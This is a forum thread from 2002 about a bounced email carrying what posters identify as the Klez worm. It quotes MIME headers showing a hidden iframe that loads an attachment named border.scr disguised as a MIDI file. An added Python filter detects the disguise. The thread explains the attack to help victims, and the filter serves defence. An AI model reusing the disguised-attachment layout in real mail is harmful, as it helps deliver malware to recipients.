Thread: What's this?.

  1. #1
    Join Date
    Jun 2002
    Posts
    1,210

    What's this?.

    Woke up yesterday and found two returned emails and then two others this morning.
    This is what it is.
    This is a MIME-encapsulated message

    Reporting-MTA: dns; rly-ip04.mx.aol.com
    Arrival-Date: Wed, 21 Aug 2002 01:04:14 -0400 (EDT)

    Final-Recipient: RFC822; [email protected]
    Action: failed
    Status: 5.1.1
    Remote-MTA: DNS; mx07.hotmail.com
    Diagnostic-Code: SMTP; 550 Requested action not taken: mailbox unavailable
    Last-Attempt-Date: Wed, 21 Aug 2002 01:05:01 -0400 (EDT)


    --------------------------------------------------------------------------------
    Received: from logs-mtc-tb.proxy.aol.com (logs-mtc-tb.proxy.aol.com [64.12.104.5]) by rly-ip04.mx.aol.com (v87.21) with ESMTP id RELAYIN10-0821010414; Wed, 21 Aug 2002 01:04:14 -0400
    Received: from Agdcb (ACA1B479.ipt.aol.com [172.161.180.121])
    by logs-mtc-tb.proxy.aol.com (8.10.0/8.10.0) with SMTP id g7L53TE74090
    for <[email protected]>; Wed, 21 Aug 2002 01:03:29 -0400 (EDT)
    Date: Wed, 21 Aug 2002 01:03:29 -0400 (EDT)
    Message-Id: <[email protected]>
    From: salesandservice <[email protected]>
    To: [email protected]
    Subject: END OF WEBTRENDS LIVE TAG
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
    boundary=FA6sszb0Sm697GW60
    X-Apparently-From: [email protected]

    --FA6sszb0Sm697GW60
    Content-Type: text/html;
    Content-Transfer-Encoding: quoted-printable

    <HTML><HEAD></HEAD><BODY>
    <iframe src=3Dcid:BRg787st3INHou height=3D0 width=3D0>
    </iframe>
    <FONT></FONT></BODY></HTML>

    --FA6sszb0Sm697GW60
    Content-Type: audio/x-midi;
    name=border.scr
    Content-Transfer-Encoding: base64
    Content-ID: <BRg787st3INHou>


    These A's and other letters go on for ages, anyone have any idea?
    Professor of crime at St Andrews university.

  2. #2
    Join Date
    Jan 2002
    Posts
    453
    Content-Type: audio/x-midi;
    name=border.scr
    Content-Transfer-Encoding: base64
    Content-ID: <BRg787st3INHou>


    Someone's trying to send you a virus...

    .scr is the extension for a screensaver; it executes if you save that and click on it.

    It's definitely not MIDI because it would have .mid at the end if it was.
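
The mismatch pointed out in post #2, turned into a mail-filter check. This is an added example, not part of the original thread: it flags an executable filename under a non-application content type, a decoded payload that begins with the `MZ` magic bytes, and an HTML iframe that loads the part by Content-ID. The extension list, the `SAMPLE` boundary, the `SAMPLECID` id and the stand-in payload are constructed for illustration.

```python
import base64
import email
import os
import re
from email import policy

# Extensions Windows will execute; short illustrative list (assumption).
EXECUTABLE_EXTS = {".scr", ".exe", ".pif", ".com", ".bat"}
CID_IFRAME = re.compile(r"<iframe[^>]+src\s*=\s*[\"']?cid:([^\s\"'>]+)", re.I)

def scan_message(raw: bytes) -> list[str]:
    """Return a list of findings for one raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings, framed = [], set()
    for part in msg.walk():  # pass 1: Content-IDs pulled in by an HTML iframe
        if part.get_content_type() == "text/html":
            framed.update(CID_IFRAME.findall(part.get_content()))
    for part in msg.walk():  # pass 2: inspect every leaf part
        if part.is_multipart():
            continue
        name = part.get_filename() or ""  # falls back to Content-Type name=
        ext = os.path.splitext(name)[1].lower()
        ctype = part.get_content_type()
        cid = (part.get("Content-ID") or "").strip().strip("<>")
        if ext in EXECUTABLE_EXTS and not ctype.startswith("application/"):
            findings.append(f"type-mismatch: {name} declared as {ctype}")
        if (part.get_payload(decode=True) or b"")[:2] == b"MZ":
            findings.append(f"pe-header: {name or ctype} begins with MZ")
        if cid in framed and ext in EXECUTABLE_EXTS:
            findings.append(f"cid-iframe: {name} referenced as cid:{cid}")
    return findings

def build_sample(name="border.scr", body=b"MZ" + b"\x00" * 30) -> bytes:
    # Constructed sample mirroring the MIME layout quoted in post #1; the
    # payload is a harmless stand-in that only carries the two magic bytes.
    b64 = base64.encodebytes(body).decode()
    return (
        "MIME-Version: 1.0\n"
        "Content-Type: multipart/alternative; boundary=SAMPLE\n\n"
        "--SAMPLE\nContent-Type: text/html\n"
        "Content-Transfer-Encoding: quoted-printable\n\n"
        "<HTML><BODY><iframe src=3Dcid:SAMPLECID height=3D0 width=3D0>\n"
        "</iframe></BODY></HTML>\n\n"
        f"--SAMPLE\nContent-Type: audio/x-midi; name={name}\n"
        "Content-Transfer-Encoding: base64\nContent-ID: <SAMPLECID>\n\n"
        f"{b64}--SAMPLE--\n"
    ).encode()

if __name__ == "__main__":
    for finding in scan_message(build_sample()):
        print(finding)
```

The base64 text in post #1 starts with `TVqQ`, which is how the `MZ` header looks once encoded, so the payload check does not depend on the filename or declared type.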

  3. #3
    Join Date
    Jun 2002
    Location
    Texas
    Posts
    7,953
    Most likely the persistent Klez virus. Our company still gets multiple Klez-infected emails daily.

  4. #4
    Join Date
    Jun 2002
    Posts
    1,210
    So guys, do you think it was sent on purpose or maybe a yes or no?
    Professor of crime at St Andrews university.

  5. #5
    Join Date
    Jul 2002
    Location
    Tasmania, Australia
    Posts
    34,796
    As it was returned mail, someone who has you on their mailing list has the virus. The Klez virus puts a random addressee in the 'from' field; in these two cases it was you. The email didn't reach the intended recipient, so it was returned to *you*. I get a couple of these returned mail thingies every day.

  6. #6
    Join Date
    Jun 2002
    Location
    Texas
    Posts
    7,953
    Someone has an ex-employee email address in their address book. The address is still received via catch-all setting. Between that and the returned emails I receive 10-20 on a daily basis.

  7. #7
    Join Date
    Aug 2002
    Location
    deville
    Posts
    214
    This is a virus sent to spread it. Not necessarily your ex-employee... anybody can send you the virus and it is not only you... the person must have sent to many others along with you from the source he found your email address from. Make it a habit to run your antivirus system on a daily basis.

  8. #8
    Join Date
    Jun 2002
    Location
    Texas
    Posts
    7,953
    Yeah, antivirus stops it. It is still annoying. I have tracked down the ISP the mail is coming from and I inform their abuse department every day. I am sure it is someone who had our employee and some shared trade emails in their address book.

  9. #9
    Join Date
    May 2002
    Location
    Michigan
    Posts
    1,799
    I get those viruses all the time.
    It sends itself out to random addys it finds on the infected computer, and uses random addys it finds on the infected computer in the from field of the emails it sends.
    Obviously your email addy was in the from field when it was sent from the infected computer to a nonexistent email address. That's why you got the 'returned' email.
    Just delete it.
    DANG DANG! DANG!!
    I know ***** ripped off everybody else, but they wouldn't do it to me.
    "When you use bottom feed for bait, you are only going to catch bottom feeders."
    "You do what you are, and you are what you do."
